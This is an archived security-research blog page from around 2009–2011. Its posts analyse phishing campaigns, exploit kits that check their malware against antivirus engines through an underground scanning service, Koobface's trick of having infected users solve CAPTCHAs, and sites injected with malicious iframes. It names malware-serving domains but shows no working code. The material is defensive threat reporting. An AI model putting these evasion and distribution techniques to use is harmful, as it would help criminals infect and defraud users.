Cybercrime « M86 Security Labs Blog

Archive for the ‘Cybercrime’ Category

Facebook ’1st Status’ Scam Spreads Rapidly

By Satnam Narang • January 11th, 2011 • Cybercrime

It shouldn’t come as a surprise that malicious activity on social networks such as Facebook has risen over the last few years, as the people behind these scam operations continue to improve their efforts. The appeal of targeting these sorts of users is the inherent trust that is built-into social networks.

Currently, there is an ongoing campaign targeting Facebook users. Users are posting status updates that claim to show what their first status update on Facebook was.

First instance of the '1st status' update scam spreading

Tags: 1st Status | Affiliate Programs | Facebook | Fake Applications | Scams

Which Bank would you like with that Phish?

By Gavin Neale • December 9th, 2010 • Cybercrime

Over the last couple of years we have seen a decline in traditional phishing schemes as cyber criminals have begun to use banking malware such as Zeus and SpyEye. These tools can steal credentials from a wide range of web sites and by using browser-in-the-middle techniques can beat two factor authentication used by many banking websites.

Lately we have seen a number of phishing emails where the phishers impersonate a third party that may have a plausible reason for interacting with your bank, such as a tax department. The Phishers then attract victims to a landing page via spam where they are asked to choose their bank from a selection. They are then shown a fake login page for that bank. This increases the chance of a Phisher matching a bank to a potential victim.

This email, targeted at British recipients, promises the recipient that they are eligible for a tax refund from HM Revenue and Customs. By clicking the Refund Me Now link they can be on their way to receiving their tax refund.

Following the link takes the recipient to the phishing landing page below with the logos of 15 banks; and asks the user to click on the logo of their bank to continue. Each logo is a link to a fake banking website that is similar to that bank’s real website.

The landing page where users are asked to select their bank

When we click on the HSBC bank logo we are taken to a page designed to phish credentials from HSBC members:

The phishing page the victim is sent to if they click the HSBC bank logo

We saw a nearly identical campaign two months ago that was phishing for bank accounts in New Zealand. This is just another technique cyber criminals are using to increase their returns as people become more aware of how phishing attacks work.

Tags: Banking Trojans | Phishing | Phishing Kit | Tax Refund | Tax Scam

Siberia Exploits Kit Fights Back Against AV Companies

By Daniel Chechik • November 30th, 2010 • Cybercrime

Siberia Exploit Kit is an evolving crimeware that was first seen in the wild in late 2009. A few months ago the author of Siberia Exploits Kit deployed an upgraded version of the toolkit, as written in the Malware Intelligence Blog.

Like our last post about Phoenix Exploit’s Kit, Siberia Exploit’s Kit author also emphasizes the issue of circumventing recognition by Anti-Virus and URL filtering services, as it contains a built in Anti-Virus checker.

Anti-Virus Detection rate of each malware

The administrator of the toolkit can perform an Anti-Virus scan of the malware and exploit pages. Moreover, the scan results of each Anti-Virus company are viewable.

Advanced information of the malware detection among the Anti-Viruses companies

It is well known that once uploading malware to a VirusTotal service, the Anti-Virus companies can re-analyze suspicious files. As such, it’s a good guess that the Siberia Exploit’s Kit doesn’t use the VirusTotal service. In this particular case, the files are sent to an underground Anti-Virus checker called “scan4you.biz”

The code that accesses to scan4you.biz AV checker (Taken from Siberia Exploit’s Kit)

Let’s take a look at our anonymous Anti-Virus checker:

After login the user can upload files and check URL’s for Anti-Virus and URL Filtering check

Of course, this service is not free. The cost is 0.15¢ for every file checked or $25 for a one month license. The website offers several scans:

File scan – Regular Anti-Virus scan
URL scan – Anti-Virus scan of URL
Blacklist / Filter scan – Check detection of URL in URL filtering services
Exploit Pack scan – Check detection of toolkit name in URL filtering services

Eventually, in order to implement this service in Siberia Exploit’s Kit, or in any other toolkit, the underground Anti-Virus check service publishes an API for remote scanning:

Snippet code of the API service provided by scan4you.biz website.

Like other techniques of evasiveness we have seen lately such as “Anti Wepawet” or “Anti JSunpack” as described in our security labs report, it appears the cybercriminals keep trying to find creative techniques to avoid malware detection in multiple layers — this time by performing an Anti-Virus scan.

Tags: Exploit Kits | Siberia | Virus scan

Changing Battlefield

By Vadim Pogulievsky • November 15th, 2010 • Cybercrime

The success of the Zeus Trojan has led directly to the creation of the ZeusTracker project, and as of a few weeks ago, the SpyEye Tracker project was put into play.

So what’s left to say other than SpyEye is now in our midst…

Now that we agree about the success of the banking Trojans, let’s talk a little bit about one of its primary victims, that being the banks themselves.

A few months ago, the M86 Security Labs team discovered another SpyEye C&C server targeting one of the largest American banks. As part of the internal M86 disclosure policy, we contacted the bank to provide the detailed information we had discovered..

In this particular case of malicious activity, the SpyEye Trojan’s “install base” included more than 270,000 infections. The bank eventually confirmed that more than 200 bank accounts had been compromised.

True, there’s nothing new in this…

However, since it’s far from being first time we’ve contacted banks to provide this type of information; we sat up and took notice of the gradual change in the way banks response to our data.

Just a year ago, a bank’s response would have been akin to:

“Why contact us? Certainly this is a police issue!” or “Where are you from? Kindly talk to your local branch”. One bank questioned, “Where is malicious server located? Eastern Europe? So, why are you contacting us?”

I believe everyone who had provided similar information to various banks encountered the same sort of responses.

Today, the situation is conceptually different. Based on several recent cases, we can verify that the banks have begun to take this information much more seriously.

First, they’ve educated themselves on banking Trojans - a refreshing change. Second, they are ready to cooperate and convey a willingness to further investigate the information provided. For example, the SpyEye case mentioned above was a process that took less than a month with the bank. At the conclusion of the case, we received complementary information that was confirmed by the bank.

Without the pretense for accurate statistics, the behavioral changes of the banks is significant, and is a result of the losses the banks suffered and continue to suffer, as result of this new type of Banker Trojans activity.

The success of Zeus and SpyEye have caused numerous copycats to appear, such as the new Bugat, Carberp, and latest Feodo Trojans. The war that the banks were engaged in at the birth of Cybercrime has become increasingly sophisticated. Given the new battle landscape, banks have begun to re-group their efforts in fighting back.

Phoenix Exploit Kit 2.0

By Daniel Chechik • August 1st, 2010 • Cybercrime

Phoenix Exploit’s Kit 2.0 is an upgraded version of the Phoenix Toolkit which was initially researched by the M86 Security Labs mid-2009.

The GUI of the admin panel has not changed significantly from the previous version, but in addition to new features and exploits, a new obfuscation technique has been employed.

Figure 1: The login panel of Phoenix Exploit’s Kit

Tags: Exploit Kits | Phoenix

Koobface malware distribution technique – automatic user account creation on FaceBook, Twitter, BlogSpot and others

By Daniel Chechik • August 11th, 2009 • Cybercrime Malware

Koobface is a well-discussed computer worm that tries to infect users using social engineering attacks. Koobface mainly abuses popular social-networking websites such as Facebook, Twitter, Bebo and Myspace.
In this post I’ll describe another, less discussed, distribution tactic of this malware – using SEO techniques. In this scenario, the malware automatically creates BlogSpot accounts and populate it with the latest news using Google news feed. It means that the trap-site contains up-to-date content with some of the most popular search terms.

The blog shown above is an example of such an account that was automatically created by Koobface. In addition to the news feed, the malware also adds a script that redirects the victim to a malicious website that tries to install the Trojan.
Following is a code snippet of the malicious script:

The user is redirected to a fake Facebook page:
http://mi[--REMOVED--]09.com/go/fb.php

In order to see the video, the user is asked to “Upgrade” his Flash Player. Needless to say, any click on this page will dupe the user to download the malware…

Once the malware is downloaded, it tries to create new accounts in various websites. To do that, it needs to overcome a security mechanism called CAPTCHA (“Completely Automated Public Turing test to tell Computers and Humans Apart”) that is present on many websites and is designed to prevent computer programs from performing certain sensitive actions such as creating new accounts.
Following are the actions created by the malware

The Koobface tactic for bypassing the CAPTCHA test is simple – it challenges its infected users with this test by presenting the window showing below. The user is prompted to enter the word(s) in the image or his machine will shut down. The CAPTCHA image is sent to the victim by the C&C server.

The virus darkens the background and leaves the user no other option than to insert the code in the CAPTCHA within 3 minutes or else it will shut down his computer (we tested it: it doesn’t shut down the machine:)).
Does this CAPTCHA look familiar? Let me give you a hint….

Indeed, the above shown CAPTCHA picture is taken from Twitter’s account creation form. Several other popular websites, such as Bebo, Gmail, and Blogger are being abused in similar manner.

Here is another example. This time, the CAPTCHA is part of a Gmail account creation:

Koobface, installed on the victim machine, gets a CAPTCHA challenge by Gmail:
The virus sends the CAPTCHA to the C&C server:

The process might take several seconds, depending how fast the person on another infected machine is inserting the code of the CAPTCHA.
The malware keeps asking the C&C for the code, until it receives it:

Once the code is retrieved, the process continues and the new account is created:

As can be seen in the Fiddler dump above, the malware used the retrieved code from the C&C to successfully create the Gmail account. I can even log into the account using the credential above…

The malware continues working and it is going to create its own blog post using the email it created. It is now going to open a blog on Blogger.com:

Firstly, as can be seen in Fiddler dump, it accesses to:
http://news.google.com/?output=rss
The virus takes the latest news results from Google which will be used to create the blog post.
Following that, it accesses Blogger.com to create a new blog post.

Shown here is the blog post that the malware created just like the one we have seen at the beginning of this post.
The cybercriminals use a webservice to collect some statistics. Below you can see the number of unique users who reached these pages in the last couple of days:

As can be seen in the Referrer statistics above, the users are reaching the malware webpage from different websites, while each URL is using a different social engineering technique to trick the user.

There is no doubt that the technique works – more than 150,000 users reached the malware webpage in just 2 days!
Posted by Daniel Chechik

Sparc.com compromised

By Anonymous • August 4th, 2009 • Cybercrime

Last week, we detected that Sparc.com website was compromised by cybercriminals. In this case, the criminals injected a script into the website that adds an IFrame to the page. This IFrame redirects the website visitors to malicious content located on updatedate.cn .

Our recent tests indicate that updatedate.cn no longer serves malicious code, however we did find records in our systems indicating that this domain used to serve malware since July 15th 2009, mostly exploiting the PDF vulnerability to infect users.
We have contacted sparc.com and reported on the incident; trusting that the problem will be fixed soon.
Posted by Yuval Ben-Itzhak

Tags: Compromised Website | Injected IFrame | PDF Vulnerability | sparc.com

Someone is watching you…

By Daniel Chechik • July 19th, 2009 • Cybercrime

As you probably know, security companies are using sandboxes in order to analyze viruses. You might be familiar with some of those sandboxes such as CWSandbox, Anubis, etc.

Those analysis tools run the virus on a virtual host for a limited time, and report to the user about the virus’s activities.

Recently, I analyzed an interesting virus. Besides the fact that this virus steals sensitive data from the user, it also connects every several minutes to an FTP account and uploads 2 files.

I took a closer look at the uploaded files, and surprisingly found this FTP full of screenshots. Let’s take a look at one screenshot.

This picture was taken from the FTP and it belongs to one of the infected machines.
I think you will all agree with me – stealing personal data is bad enough, but tracking each and every move we make?! No… That’s really too much!

Of course, on this FTP I also found a screenshot of my sandbox’s desktop:

Other sandboxes didn’t get away with it either… you probably recognized CWSandbox here:

Like facing mirrors, we were watching them watching us watching them…
Posted by Daniel Chechik

Tags: Desktop Screenshot | Sandbox | Spy